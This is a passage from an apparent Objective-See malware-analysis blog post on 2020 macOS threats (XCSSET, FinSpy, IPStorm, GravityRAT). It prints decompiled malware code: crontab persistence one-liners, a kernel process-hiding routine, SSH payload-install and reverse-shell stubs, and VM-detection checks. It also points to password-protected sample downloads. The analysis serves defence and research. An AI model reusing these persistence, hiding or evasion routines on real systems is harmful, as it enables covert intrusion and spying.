the malware. For example (as noted by TrendMicro) the remove_old module, “removes\r\n… ~/Library/LaunchAgents/com.apple.core.launchd.plist ” while the cleaner module “removes\r\n~/Library/LaunchAgents/com.apple.core.accountsd.plist ”\r\n…thus some versions/variants of the OSX.XCSSET may persist via normal mechanisms (e.g. launch agents).\r\n Capabilities: Credential Stealing, Data Exfiltration, Ransomware, Viral Replication ...and more!\r\nOne of the main goals of `OSX.XCSSET` is to steal credentials and exfiltrate data from user applications.\r\nA writeup by Intego notes:\r\n\"XCSSET attempts to steal passwords from victims’ Apple ID, Google, Paypal, and other accounts. ...\r\n[the malware] also attempts to exfiltrate data from apps such as Apple Notes, Evernote, Skype,\r\nTelegram, and WeChat\" -Intego\r\nIt should be noted that on recent versions of macOS, malware is are prevented from accessing various user/system\r\nfiles, unless the user has manually granted the application “Full Disk Access” (via the System Preferences\r\napplication).\r\nTo work around this privacy mechanism, OSX.XCSSET leverages (what were) two 0day exploits:\r\nThe first vulnerability (implemented in the malware’s safari_cookie module) abuses the fact that Full Disk\r\nAccess is granted to the ssh service. The malware simply (ab)uses scp to “connect” to the system it’s running\r\non ( username@localhost ) and copy protected files (e.g. Safari’s binary cookie file).\r\nThe second vulnerability involves leverages SafariForWebKitDevelopment :\r\nAs noted in a Jamf writeup on the malware:\r\n\"The second exploit leverages a developer specific tool. If the device doesn’t already have the\r\nSafariForWebKitDevelopment component installed, the malware goes and downloads it. With this, it\r\ncan utilize Safari’s extensive capabilities without being hindered by the usual sandbox.\" -Jamf\r\n…in order to gain code execution within the context of Apple’s SafariForWebKitDevelopment binary, the\r\nmalware (ab)uses the DYLD_FRAMEWORK_PATH and DYLD_LIBRARY_PATH environment variables:\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 31 of 62\n\nOSX.XCSSET's dylib injection (credit: TrendMicro)\r\nOnce loaded within the (developer version of) Safari, the malicious code (JavaScript) can be downloaded and\r\nexecuted without being constrained by normal browser restrictions. This allows it manipulate browser results, as\r\nwell as steal credentials from various sites of interest.\r\nThe combination of these two exploits is rather potent, and allows OSX.XCSSet perform its credential stealing and\r\ndata exfiltration actions quite effectively:\r\n\"XCSSet effectively has all the tools it needs to run arbitrary code and touch every file on the system,\r\nneatly sidestepping the strong defenses in macOS.\" -Jamf\r\nAnd what if the user doesn’t have Safari? Well as Intego notes:\r\n“And just in case the victim doesn’t use Safari, XCSSET also has the capability of installing Trojanized versions\r\nof many other Mac browsers: Google Chrome, Mozilla Firefox, Microsoft Edge, Brave, Opera, 360 (a Chinese\r\nbrowser), and Yandex (a Russian browser).”\r\nBesides credential / data stealing, OSX.XCSSET supports a myriad of other capabilities (implemented via payload\r\nmodules). The TrendMicro report summarizes the plugins (and their capabilities). Some notable plugins,\r\nmentioned in the report include:\r\nscreen :\r\nTakes screenshots of an infected system.\r\nencrypter :\r\nEncrypts (ransoms) users files (via AES in CBC mode).\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 32 of 62\n\nreplicator :\r\nInfects local Xcode projects with its malicious code.\r\n👾 OSX.FinSpy\r\nFinSpy is commercial cross-platform implant, supporting a myriad of cyber espionage features \u0026 capabilities.\r\n Download: OSX.FinSpy (password: infect3d )\r\nThe malware was discovered by Amnesty International, as seen in the tweet by Claudio Guarnieri, their “Head of\r\nSecurity Lab”:\r\nSometimes threat intel is hard, sometimes folks leave all FinFisher samples exposed on a webserver. So\r\nhere ya go, along with recent Windows and Android, we're publishing details on new FinFisher for Mac\r\nOS 🍎 and Linux 🐧.https://t.co/eakdBWcYbF\r\n— nex (@botherder@mastodon.social) (@botherder) September 25, 2020\r\nTitled, “German-made FinSpy spyware found in Egypt, and Mac and Linux versions revealed,” the Amnesty\r\nInternational writeup detailed FinFisher’s spyware suite (FinSpy), including “previously undisclosed versions for\r\nLinux and MacOS computers”\r\nAs noted in their report:\r\n\"FinSpy is a commercial spyware suite produced by the Munich-based company FinFisher Gmbh.\r\nSince 2011 researchers have documented numerous cases of targeting of Human Rights Defenders\r\n(HRDs) - including activists, journalists, and dissidents with the use of FinSpy in many countries,\r\nincluding Bahrain, Ethiopia, UAE, and more.\"\r\n Writeups:\r\n“FinFisher Filleted 🐟”\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 33 of 62\n\n“The Finfisher Tales, Chapter 1: The dropper”\r\n“German-made FinSpy spyware found in Egypt, and Mac and Linux versions revealed”\r\n Infection Vector: Unknown\r\nAmnesty International uncovered “a server located at the IP address 158.69.105[.]207” …hosting various FinSpy\r\nsamples, including a macOS variant:\r\nFinSpy Server (credit: Amnesty International)\r\nUnfortunately there was no clear indication how (macOS) targets were infected.\r\nCommercial spyware is often sold to customers, who are then responsible for figuring out how to deploy the\r\nsoftware to (read: infect) targets of interest.\r\nSuch customers may (separately) purchase exploits, or craft their own social engineering campaigns to\r\ncompromise their targets.\r\nHowever, we should note that the malware was distributed as disk image, containing a single item: an application\r\nbundle named Install Çağlayan :\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 34 of 62\n\n/Volumes/caglayan-macos/Install Çağlayan.app\r\n…with a bundle identifier of com.coverpage.bluedome.caglayan.desktop.installer :\r\n$ cat \"/Volumes/caglayan-macos/Install Çağlayan.app/Contents/Info.plist\"\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?\u003e\r\n\u003c!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\r\n\u003cplist version=\"1.0\"\u003e\r\n \u003cdict\u003e\r\n \r\n \u003ckey\u003eCFBundleExecutable\u003c/key\u003e\r\n \u003cstring\u003eInstall Çağlayan\u003c/string\u003e\r\n \r\n \u003ckey\u003eCFBundleIdentifier\u003c/key\u003e\r\n \u003cstring\u003ecom.coverpage.bluedome.caglayan.desktop.installer\u003c/string\u003e\r\n ...\r\n \u003c/dict\u003e\r\n\u003c/plist\u003e\r\nThis may indicate that the malware was distributed as a trojanized application or perhaps was attempting to\r\nmasquerade as a legitimate application (perhaps for the Turkish news(?) site, Çağlayan ( caglayandergisi.com )).\r\n Persistence: Launch Agent\r\nIf the malicious application ( Install Çağlayan.app ) is run, it will eventually execute an installer (that was\r\ncopied to ~/Library/Caches/org.logind.ctp.archive/installer ).\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 35 of 62\n\nAs noted in the Amnesty writeup, this installer performs three actions:\r\n1. Copies plugins and config files to /Library/Frameworks/Storage.framework .\r\n2. Copies the launcher ( logind ) to /private/etc/logind .\r\n3. Persists the launcher, by creating a launch agent plist: /System/Library/LaunchAgents/logind.pslist .\r\nLet’s take a closer look at it now, to highlight the code responsible for these actions.\r\nThe org.logind.ctp.archive/installer is a Mach-O binary, rather similar (albeit simpler) than its parent,\r\n.log/ARA0848.app/Contents/MacOS/installer . (For example, both contain a custom GIFileOps class that\r\nimplements various file related methods ( copy: to: , loadAgent , etc.).\r\nThis (next stage) installer’s main method starts at 0x000000010a3d95ac . The logic the the main function first\r\nchecks for the presence of various files (plugins?), such as /Library/Frameworks/Storage.framework ,\r\n/Contents/Resources/7f.bundle/Contents/Resources/AAC.dat . It then builds a dictionary of key-value pairs via\r\na call to [GIPath installationMap] :\r\n$ lldb org.logind.ctp.archive/installer\r\n...\r\n* thread #1, queue = 'com.apple.main-thread'\r\ninstaller`main:\r\n-\u003e 0x10a3da37e \u003c+3538\u003e: callq *0x6d04(%rip) ;objc_msgSend\r\n(lldb) x/s $rsi\r\n0x10a3df5c7: \"installationMap\"\r\n(lldb) ni\r\n(lldb) po $rax\r\n{\r\n \"/Users/user/Library/Caches/org.logind.ctp.archive/Storage.framework\"\r\n → \"/Library/Frameworks/Storage.framework\";\r\n \"/Users/user/Library/Caches/org.logind.ctp.archive/logind\"\r\n → \"/private/etc/logind\";\r\n \"/Users/user/Library/Caches/org.logind.ctp.archive/logind.kext\"\r\n → \"/System/Library/Extensions/logind.kext\";\r\n \r\n \"/Users/user/Library/Caches/org.logind.ctp.archive/logind.plist\"\r\n → \"/Library/LaunchAgents/logind.plist\";\r\n}\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 36 of 62\n\nAs we can see in the debugger output, this maps files from the decrypted uncompressed archive\r\n( org.logind.ctp.archive ) to their final destinations.\r\nThe installer then iterates over each of these files, and via a block (at 0x000000010a3da4d2 ) moves them from the\r\narchive to their (final) destinations:\r\n1files = [GIPath installationMap];\r\n2[files enumerateKeysAndObjectsUsingBlock:(void (^)(KeyType src, ObjectType dest, BOOL *stop))\r\n3{\r\n4\r\n5 [GIFileOps move:src to:dest];\r\n6 [GIFileOps setStandardAttributes:dest];\r\n7\r\n8}];\r\nWe can passively observe this via our File Monitor:\r\n# FileMonitor.app/Contents/MacOS/FileMonitor -pretty -filter installer\r\n{\r\n \"event\" : \"ES_EVENT_TYPE_NOTIFY_RENAME\",\r\n \"file\" : {\r\n \"destination\" : \"/Library/LaunchAgents/logind.plist\",\r\n \"source\" : \"/Users/user/Library/Caches/org.logind.ctp.archive/logind.plist\"\r\n }\r\n}\r\n{\r\n \"event\" : \"ES_EVENT_TYPE_NOTIFY_RENAME\",\r\n \"file\" : {\r\n \"destination\" : \"/private/etc/logind\",\r\n \"source\" : \"/Users/user/Library/Caches/org.logind.ctp.archive/logind\"\r\n }\r\n}\r\n{\r\n \"event\" : \"ES_EVENT_TYPE_NOTIFY_RENAME\",\r\n \"file\" : {\r\n \"destination\" : \"/System/Library/Extensions/logind.kext\",\r\n \"source\" : \"/Users/user/Library/Caches/org.logind.ctp.archive/logind.kext\"\r\n }\r\n}\r\n{\r\n \"event\" : \"ES_EVENT_TYPE_NOTIFY_RENAME\",\r\n \"file\" : {\r\n \"destination\" : \"/Library/Frameworks/Storage.framework\",\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 37 of 62\n\n\"source\" : \"/Users/user/Library/Caches/org.logind.ctp.archive/storage.framework\"\n }\n}\nLet’s take a closer look at the logind.plist :\n$ cat /Library/LaunchAgents/logind.plist\n?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\nUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\nLabelorg.logindProgramArguments/private/etc/logindRunAtLoadKeepAliveSuccessfulExit As the RunAtLoad key is set to true , the binary, /private/etc/logind will be automatically (re)executed\neach time the system is rebooted an the user logs in.\nOnce the installer has, well, installed (and setuid’d) these various components, it kicks off this persistent launch\nagent via a call to [GIFileOps loadAgent:]\nThis method simply invokes launchctl with the load command line argument, and path to the logind.plist\nto:\n 1+(char)loadAgent:(char *)plist {\n 2\n 3 task = [[NSTask alloc] init];\n 4 [task setLaunchPath:@\"/bin/launchctl\"];\n 5 args = [NSArray arrayWithObjects:@\"load\", plist, 0x0];\n 6 [r15 setArguments:args];\n 7\n 8 [task launch];\nhttps://objective-see.com/blog/blog_0x5F.html\nPage 38 of 62\n\n9 [task waitUntilExit];\r\n10 ...\r\n11}\r\nThe persistent implant ( /private/etc/logind ), is now off and running!\r\n Capabilities: Persistent Implant with plugin-based modules and a kernel-level rootkit\r\nAmnesty’s writeup details the capabilities of FinSpy , noting such capabilities are implemented via plugins:\r\n\"FinSpy for Mac OS ...follow(s) a modular design. The launcher `logind` only instantiates the core\r\ncomponent `dataPkg`, which oversees communications with the Command and Control server (C\u0026C),\r\nand decrypting/launching modules when needed. The modules are encrypted with the AES algorithm\r\nand compressed with the `aplib` compression library. The AES key is stored in the binary, but the IV is\r\nstored in each configuration file along with a MD5 hash of the final decompressed file.\"\r\nThe rather extensive list of modules available to the spyware include:\r\nAnother interesting capability of this malware is its kernel-mode rootkit functionality. Simply put, (public) macOS\r\nmalware with ring-0 capabilities is rare!\r\nThe file logind.kext is FinSpy ’s kernel extension …though it is unsigned:\r\n$ codesign -dvv org.logind.ctp.archive/logind.kext/Contents/MacOS/logind\r\nlogind.kext/Contents/MacOS/logind: code object is not signed at all\r\nAs the kernel extension is unsigned, it won’t run on any recent version of macOS (which enforce kext code\r\nsigning requirements).\r\nIt terms of it’s functionality, it appears to be a simple process hider.\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 39 of 62\n\nIn a function named ph_init , the kernel extension looks up a bunch of kernel symbols (via a function named\r\nksym_resolve_symbol_by_crc32 ):\r\n 1void ph_init() {\r\n 2\r\n 3 rax = ksym_resolve_symbol_by_crc32(0x127a88e8, rsi, rdx, rcx);\r\n 4 *_ALLPROC_ADDRESS = rax;\r\n 5\r\n 6 ...\r\n 7\r\n 8 rax = ksym_resolve_symbol_by_crc32(0xfffffffffef1d247, rsi, rdx, rcx);\r\n 9 *_LCK_LCK = rax;\r\n10 if (rax != 0x0)\r\n11 *_LCK_LCK = *rax;\r\n12\r\n13 ...\r\n14\r\n15 rax = ksym_resolve_symbol_by_crc32(0x392ec7ae, rsi, rdx, rcx);\r\n16 *_LCK_MTX_LOCK = rax;\r\n17 if (rax != 0x0)\r\n18 *_LCK_MTX_UNLOCK = ksym_resolve_symbol_by_crc32(0x2472817c, rsi, rdx, rcx);\r\n19\r\n20\r\n21 return;\r\n22}\r\nBased on variable names, it appears that logind.kext is attempting to resolve the pointer of the kernel’s global\r\nlist of proc (process) structures, as well as various locks.\r\nIn a function named ph_hide the kext will hide a process. This is done by walking the list of proc structures\r\n(pointed to by _ALLPROC_ADDRESS ), and looking for the one that matches (to hide):\r\n 1void _ph_hide(int arg0) {\r\n 2\r\n 3 r14 = arg0;\r\n 4 if (r14 == 0x0) return;\r\n 5\r\n 6 r15 = *_ALLPROC_ADDRESS;\r\n 7 if (r15 == 0x0) goto return;\r\n 8\r\n 9SEARCH:\r\n10\r\n11 rax = proc_pid(r15);\r\n12 rbx = *r15;\r\n13 if (rax == r14) goto HIDE;\r\n14\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 40 of 62\n\n15loc_15da:\r\n16 r15 = rbx;\r\n17 if (rbx != 0x0) goto SEARCH;\r\n18\r\n19 return;\r\n20\r\n21HIDE:\r\n22 r14 = *(r15 + 0x8);\r\n23 (*_LCK_MTX_LOCK)(*_LCK_LCK);\r\n24 *r14 = rbx;\r\n25 *(rbx + 0x8) = r14;\r\n26 (*_LCK_MTX_UNLOCK)(*_LCK_LCK);\r\n27 return;\r\n28}\r\nIn the above code, note that HIDE contains the logic to remove the target process of interest, by unlinking it from\r\nthe (process) list. Once removed, the process is now (relatively) “hidden”. (Of course one can leverage XNU level\r\nAPIs to uncover such process hiding).\r\nThe malicious kext also appears to be able to communicate with user-mode via the file /tmp/launchd-935.U3xqZw . Specifically, in a function named ksym_init , it will open and read in the contents of this file\r\n(which may contain details of the process to hide?):\r\n 1void ksym_init(int arg0, int arg1) {\r\n 2 *(int32_t *)_MKI_SIZE = fileio_get_file_size(\"/tmp/launchd-935.U3xqZw\", arg1);\r\n 3 rax = _OSMalloc_Tagalloc(\"MKI\", 0x0);\r\n 4 *_MKI_TAG = rax;\r\n 5 if (rax == 0x0) goto .l1;\r\n 6\r\n 7loc_1898:\r\n 8 rax = _OSMalloc(*(int32_t *)_MKI_SIZE, rax);\r\n 9 *_MKI_BUFFER = rax;\r\n10 if (rax == 0x0) goto loc_1921;\r\n11\r\n12loc_18b2:\r\n13 if (fileio_read_file_fully(\"/tmp/launchd-935.U3xqZw\", rax) == 0x0) goto loc_1908;\r\n14\r\n15 ....\r\n16}\r\n👾 IPStorm\r\nIPStorm is a cross platform botnet, now ported to macOS. Though it’s capabilities are limited on macOS, it\r\nsupport a reverse shell, ad faud, and more.\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 41 of 62\n\nDownload: IPStorm (password: infect3d )\r\nIn early October researchers a Intezer published a report about IPStorm being ported from Windows to Linux…\r\nand also macOS:\r\n\"Our research team recently identified new Linux variants of IPStorm targeting various Linux\r\narchitectures (ARM, AMD64, Intel 80386) and platforms (servers, Android, IoT). We have also\r\ndetected a macOS variant.\" -Intezer\r\nThe macOS version of IPStorm is packed with the UPX packer. Luckily we can use UPX itself (via the -d flag)\r\nto completely unpack the malware:\r\n$ ./upx -d IPStorm\r\n Ultimate Packer for eXecutables\r\n Copyright (C) 1996 - 2013\r\nUPX 3.09 Markus Oberhumer, Laszlo Molnar \u0026 John Reiser Feb 18th 2013\r\nWith LZMA support, Compiled by Mounir IDRASSI (mounir@idrix.fr)\r\n File size Ratio Format Name\r\n -------------------- ------ ----------- -----------\r\n 20172924 \u003c- 8216592 40.73% Mach/AMD64 IPStorm\r\nUnpacked 1 file.\r\n…once unpacked, analysis can commence.\r\n Writeups:\r\n“A Storm is Brewing: IPStorm Now Has Linux Malware”\r\n“GravityRAT and IPStorm: Mac Malware, Ported from Windows”\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 42 of 62\n\nInfection Vector: SSH Brute Forcing(?)\r\nIt is not clear how IPStorm infects macOS systems. However, the Intezer report notes that the malware can\r\nspread via SSH brute-forcing:\r\n\"The [malware] attempts to spread and infect other victims on the internet by using SSH brute-force.\r\nOnce a connection is established ...it will proceed to download the payload and infect the server.\" -\r\nIntezer\r\nAt address 00000000046e70b0 we find a function named storm/scan_tools/ssh.brute …that if successfully\r\nbrute-forces a SSH connection on a remote system will call storm/scan_tools/ssh.InstallPayload . This\r\nfunction will ascertain the architecture of the (newly) accessed system (via a call to\r\nstorm/scan_tools/ssh.SystemInfo.GoArch ), and the proceeds to download the appropriate payload (via\r\nstorm/statik.GetFileContents ).\r\nOnce the payload has been downloaded to the remote system, IPStorm invokes a function named ssh.\r\n(*Session).Start …which eventually calls runtime.newproc to (likely) kick off the payload on th remote\r\nsystem.\r\n1int ssh.InstallPayload(...) {\r\n2\r\n3 ssh.SystemInfo.GoArch(...);\r\n4\r\n5 statik.GetFileContents(...);\r\n6\r\n7 ssh.(*Session).Start(...);\r\n8\r\n9}\r\n Persistence: None(?)\r\nWhile the Windows and Linux versions of IPStorm will persist, it does not appear that the macOS version\r\nsupports persistence.\r\nThe Intezer report details a function in the Linux variant, filetransfer.(*File).Persist that, “archives\r\npersistence”.\r\nWe find this same function in the macOS version (at address 0x004491620 ) …however it does not appear to\r\ncontain any persistence logic, but instead references the string \"Persist not implemented on platform %s\" :\r\n1;filetransfer.(*File).Persist\r\n2...\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 43 of 62\n\n3lea rax, qword [0x4910358] ;\"Persist not implemented on platform %s\"\r\nMoreover executing the malware (in a virtual machine) does not generate any persistent events.\r\n Capabilities: Remote Shell, Ad Faud, etc...\r\nDuring their analysis of the Linux variant, the Intezer researchers noted that IPStorm would create a reverse\r\nshell via functions named backshell.* .\r\nWe find these same functions in the macOS variant:\r\nbackshell.* functions\r\nTaking a peek at the backshell.openLocalShell function reveals it invoking powershell.\r\n(*Backend).StartProcess …passing in bash\r\n1int storm/backshell.openLocalShell(...) {\r\n2 ...\r\n3\r\n4 //0x48ed0be -\u003e \"bash\"\r\n5 storm/powershell.(*Backend).StartProcess(..., 0x48ed0be, ...);\r\n6\r\n7}\r\nLooking at sockets on an infected system (via our tool Netiquette), we find that the malware has created a\r\nlistening socket on a high port:\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 44 of 62\n\nListening Socket\r\n…this might indicate that the malware creates a listener socket in process to facilitate the reverse shell (and\r\nperhaps passes the commands then to bash to execute).\r\nIn the Intezer report, the researches noted that the Linux version of IPStorm also engages in fraudulent activities:\r\n\"IPStorm’s Linux variant takes advantage of its being widespread to perform different fraudulent\r\nactivity in the background, abusing gaming and ads monetization. Because it’s a botnet, the malware\r\nutilizes the large amount of requests from different trusted sources, thus not being blocked nor\r\ntraceable.\" -Intezer\r\nBy sniffing network traffic we can confirm that the macOS variant also engages in such activities …specifically\r\nfraudulent ad monetization:\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 45 of 62\n\nFraudulent Ad Monetization\r\n…to a large number of remote IP addresses (though some may be other members of the botnet, or SSH brute-force\r\nattempts):\r\nSo ... Many ... Connections\r\n👾 GravityRat\r\nGravityRat is cross-platform remote administration tool (RAT …backdoor) now ported to macOS. The (available)\r\nsamples, are persistent first-stage downloaders.\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 46 of 62\n\nDownload: GravityRAT (password: infect3d )\r\nIn October, Kaspersky published a new report on the intriguing cross-platform spyware, GravityRAT (\"used to\r\ntarget the Indian armed forces\"). In this report, they noted that for the first time, “there are now versions for …\r\nmacOS”.\r\nThe Kaspersky repprt mentioned several samples (of trojanized applications) that were all persistent first-stage\r\ndownloaders.\r\n$ shasum OSX.GravityRAT/*\r\n086b22075d464b327a2bcbf8b66736560a215347 ~/OSX.GravityRAT/Enigma\r\n696c7cbba2c9326298f3ddca5f22cfb20a4cd3ee ~/OSX.GravityRAT/OrangeVault\r\ne33894042f3798516967471d0ce1e92d10dec756 ~/OSX.GravityRAT/StrongBox\r\n9b5b234e3b53f254bc9b3717232d1030e340c7f2 ~/OSX.GravityRAT/TeraSpace\r\n…here, we’ll focus mainly on the Enigma sample ( 086b22075d464b327a2bcbf8b66736560a215347 ) and\r\nStrongBox sample ( e33894042f3798516967471d0ce1e92d10dec756 ).\r\n Writeups:\r\n“GravityRAT: The spy returns”\r\n“Adventures in Anti-Gravity (Part 1)”\r\n“Adventures in Anti-Gravity (Part 2)”\r\n Infection Vector: Trojanized Applications\r\nKaspersky’s report notes that (at least one sample of) the Windows versions was “downloaded from the site\r\nenigma.net[.]in under the guise of a secure file sharing app to protect against ransomware”. The macOS version\r\n( Enigma ) also appears to masquerade as such an application:\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 47 of 62\n\nEnigma's user interface\r\nIt’s unknown how the user is coerced into downloading and running the trojaned application, but it they do - they\r\nmay end up infected.\r\n…may, as the sample(s) are unsigned:\r\n$ for i in OSX.GravityRAT/*; do codesign -dvvv $i; done\r\nOSX.GravityRAT/Enigma: code object is not signed at all\r\nOSX.GravityRAT/OrangeVault: code object is not signed at all\r\nOSX.GravityRAT/StrongBox: code object is not signed at all\r\nOSX.GravityRAT/TeraSpace: code object is not signed at all\r\n…meaning that on recent version of macOS (Gatekeeper) will block them (unless the user manually removes the\r\nquarantine attribute, or if distirbuted in a .pkg, clicks through various warnings).\r\n Persistence: Cron Job (of a 2nd-stage payload)\r\nThe samples themselves, don’t appear to persist. However, (2nd-stage) payloads that are downloaded, are persisted\r\n(by the malware).\r\nThe Kaspersky report, notes, “The Mac version …adds a cron job”\r\nFor the Enigma sample, we find this persistence logic in a function named format :\r\n 1def format(self, src, des, uc):\r\n 2 ...\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 48 of 62\n\n3 if not os.path.isfile(des):\r\n 4 os.system('cp ' + src + ' ' + des)\r\n 5 if des[-3:] == '.py':\r\n 6 os.system('sudo crontab -l 2\u003e/dev/null;\r\n 7 echo \"*/2 * * * * python ' + des + '\" | sudo crontab -')\r\n 8 else:\r\n 9 os.chmod(des, 448)\r\n10 des += ' ' + uc\r\n11 os.system('sudo crontab -l 2\u003e/dev/null;\r\n12 echo \"*/2 * * * * ' + des + '\" | sudo crontab -')\r\n13 return '+O '\r\nVia crontab the malware persists a downloaded file (a 2nd-stage payload), as a cron job. This malicious cron job\r\nis set to run every two minutes ( */2 * * * * ).\r\nThe StrongBox sample also persists a downloaded file, via a function scheduleMac to persist and launch the\r\ndownloaded payload. The scheduleMac function persists the downloaded payload as cron job, via the builtin\r\ncrontab command:\r\n 1function scheduleMac(fname,agentTask)\r\n 2{\r\n 3 ...\r\n 4 var poshellMac = loclpth+\"/\"+fname;\r\n 5 execTask('chmod -R 0700 ' + \"\\\"\" + + \"\\\"\" );\r\n 6\r\n 7 ...\r\n 8 arg = agentTask;\r\n 9 execTask('crontab -l 2\u003e/dev/null;\r\n10 echo \\' */2 * * * * ' + \"\\\"\" +poshellMac + \"\\\" \" + arg + '\\'\r\n11 | crontab -', puts22);\r\n12}\r\n…the persisted payload, will be (re)launched every two minutes ( */2 * * * * ).\r\n Capabilities: 1st-stage downloader\r\nThe macOS GravityRat samples appear to simply be 1st-stage downloaders …as the reach out to a remote\r\ncommand \u0026 control servers to download (and persist) 2nd-stage payloads.\r\nBefore downloading and persisting the next stage payloads though, the malware performs several checks\r\n(implemented in the the main.js file):\r\nCheck if running in a VM\r\nCheck if not connected to the Internet\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 49 of 62\n\nCheck if not running with Full Disk Access (FDA)\r\nLet’s take a closer look at each of these.\r\nThe aptly named function, VMCheck , checks if the application is running within a Virtual Machine. Virtual\r\nmachine checks are commonly found in malware, in an attempt to ascertain if a malware analyst is (likely)\r\nexamining the code (in a virtual machine).\r\n 1function VMCheck(stdout) {\r\n 2\r\n 3 if (stdout.includes(\"innotek GmbH\") ||\r\n 4 stdout.includes(\"VirtualBox\") ||\r\n 5 stdout.includes(\"VMware\") ||\r\n 6 stdout.includes(\"Microsoft Corporation\" ||\r\n 7 stdout.includes(\"HITACHI\"))) {\r\n 8\r\n 9 axios.post(srdr, {\r\n10 value: 'vm',\r\n11 status: true\r\n12 })\r\n13\r\n14 ...\r\n15\r\n16 const options = {\r\n17 type: 'question',\r\n18 buttons: ['Ok'],\r\n19 defaultId: 2,\r\n20 title: 'StrongBOX - Operation Not Permitted in VirtualBOX',\r\n21 message: 'Action Required',\r\n22 detail: 'StrongBOX - Unable to load components\\n\r\n23 Please exit virtual mode to launch the application.'\r\n24 };\r\n25\r\n26 dialog.showMessageBox(null, options, (response, checkboxChecked) =\u003e {\r\n27 app.quit();\r\n28 app.exit();\r\n29 });\r\n…pretty easy to see its checking if the passed in parameter ( stdout ) contains strings related to popular virtual\r\nmachine products (e.g. VMware ). So what’s in the stdout parameter? Well, if the malware is running on a\r\nmacOS system, the VMCheck function will be invoked from within a function named Vmm :\r\n1function Vmm() {\r\n2 var modname = exec(\"system_profiler SPHardwareDataType | grep 'Model Name'\");\r\n3 var smc = exec(\"system_profiler SPHardwareDataType | grep 'SMC'\");\r\n4 var modid = exec(\"system_profiler SPHardwareDataType | grep 'Model Identifier'\");\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 50 of 62\n\n5 var rom = exec(\"system_profiler SPHardwareDataType | grep 'ROM'\");\r\n6 var snum = exec(\"system_profiler SPHardwareDataType | grep 'Serial Number'\");\r\n7 VMCheck(modname + smc + modid + rom + snum);\r\n8}\r\nThe Vmm function gets the system identifying information such as the model name, model identifier, serial\r\nnumber and more. If executed within a virtual machine, this information will contain VM-related strings:\r\n$ system_profiler SPHardwareDataType | grep 'Model Identifier'\r\n Model Identifier: VMware7,1\r\n$ system_profiler SPHardwareDataType | grep 'ROM'\r\n Boot ROM Version: VMW71.00V.16221537.B64.2005150253\r\n Apple ROM Info: [MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7]\r\n Welcome to the Virtual Machine\r\n…thus the malware will be able to detect it’s running within a virtual machine …and display an error message\r\n 1function VMCheck(stdout) {\r\n 2\r\n 3 ...\r\n 4\r\n 5 const options = {\r\n 6 type: 'question',\r\n 7 buttons: ['Ok'],\r\n 8 defaultId: 2,\r\n 9 title: 'StrongBOX - Operation Not Permitted',\r\n10 message: 'Oops!! Something went wrong. ',\r\n11 detail: 'Please check your internet connection and try again.'\r\n12 };\r\n13\r\n14 dialog.showMessageBox(null, options, (response, checkboxChecked) =\u003e {\r\n15 app.quit();\r\n16 app.exit();\r\n17 });\r\n18 });\r\nHowever, it appears that perhaps there is bug in the malware’s code, and an incorrect error message will be\r\ndisplayed … “Please check your internet connection and try again.”:\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 51 of 62\n\n(incorrect) Error Message\r\nThe main.js file also contains logic for a simple “is connected” check. Often malware performs such checks to\r\nensure it can communicate with a remote command and control server, and/or to detect if it is perhaps executing\r\non an offline analysis system.\r\nTo ascertain if it’s running on an Internet connection system, the malware invokes a function named connection\r\nwhich simply attempts to ping www.google.com :\r\n 1function connection(){\r\n 2 execRoot('ping -t 4 www.google.com', function(error, stdout, stderr){\r\n 3 if(error || error !== null){\r\n 4 const options = {\r\n 5 type: 'question',\r\n 6 buttons: ['Ok'],\r\n 7 defaultId: 2,\r\n 8 title: 'Internet Connectivity Required',\r\n 9 message: 'Action Required',\r\n10 detail: \"Sorry! Please check your internet connectivity and try again.\"\r\n11 };\r\n12\r\n13 dialog.showMessageBox(null, options, (response, checkboxChecked) =\u003e {\r\n14 app.quit();\r\n15 app.exit();\r\n16 });\r\n17\r\n18 } });\r\n19}\r\nVia our Process Monitor, we can observe this execution of the ping command:\r\n# ProcessMonitor.app/Contents/MacOS/ProcessMonitor -pretty\r\n...\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 52 of 62\n\n{\r\n \"event\" : \"ES_EVENT_TYPE_NOTIFY_EXEC\",\r\n \"process\" : {\r\n \"uid\" : 501,\r\n \"arguments\" : [\r\n \"ping\",\r\n \"-t\",\r\n \"4\",\r\n \"www.google.com\"\r\n ],\r\n \"ppid\" : 1447,\r\n \"ancestors\" : [\r\n 1447,\r\n 1\r\n ],\r\n \"path\" : \"/sbin/ping\",\r\n ...\r\n }\r\n}\r\nLastly the main.js function checks if the malware has been granted Full Disk Access (FDA).\r\nOn recent versions of macOS, applications are prevented from accessing various user/system files, unless the user\r\nhas manually granted the application “Full Disk Access” (via the System Preferences application).\r\nAs such, malware that desires indiscriminate file system access may attempt to coerce users into granting such\r\naccess.\r\nIn order to check if has Full Disk Access, GravityRat attempts to list the files in the ~/Library/Safari . As this\r\ndirectory is inaccessible to applications without FDA, this is sufficient check. If the malware determines it does\r\nnot have FDA, it will prompt to the user to grant such access:\r\n 1var 